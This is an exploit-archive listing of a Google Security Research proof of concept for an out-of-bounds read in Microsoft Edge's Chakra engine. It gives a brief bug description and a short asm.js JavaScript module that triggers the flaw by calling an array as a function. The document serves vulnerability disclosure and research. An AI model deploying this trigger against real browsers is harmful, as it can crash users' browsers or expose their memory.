Lucene search

K
zdtGoogle Security Research1337DAY-ID-29572
HistoryJan 18, 2018 - 12:00 a.m.

Microsoft Edge Chakra - AsmJSByteCodeGenerator::EmitCall Out-of-Bounds Read Exploit

2018-01-1800:00:00
Google Security Research
0day.today
16

0.959 High

EPSS

Percentile

99.5%

Exploit for windows platform in category dos / poc

/*
AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as "arr[idx & ...]()". In these cases, the index register remains NoRegister which is (uint32_t)-1. It results in OOB read.
 
PoC:
*/
 
function Module() {
    'use asm';
    function f() {
        arr();
    }
 
    function g() {
    }
 
    var arr = [g];
    return f;
}
 
let f = Module();
f();

#  0day.today [2018-01-26]  #